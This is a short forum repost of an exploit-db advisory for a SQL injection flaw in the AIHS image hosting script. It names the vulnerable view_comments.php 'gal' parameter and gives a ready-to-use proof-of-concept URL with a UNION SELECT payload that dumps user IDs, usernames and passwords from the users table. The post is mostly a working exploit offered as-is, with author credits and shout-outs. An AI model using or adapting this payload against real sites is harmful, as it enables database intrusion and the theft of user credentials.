The_Arhitect Posted January 12, 2012 Report Posted January 12, 2012 # Exploit Title: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )# Software Link: http://yabsoft.com/# Tested on: [Linux/Windows 7]#Vulnerable File:view_comments.php#Vulnerable parameter:view_comments.php?gal=[gallery id]##############################################################PoC:www.example.com/view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users--##############################################################www.areyousecure.netwww.websiteauditing.org# Shouts to the Belegit crewsource: exploit-db.com Quote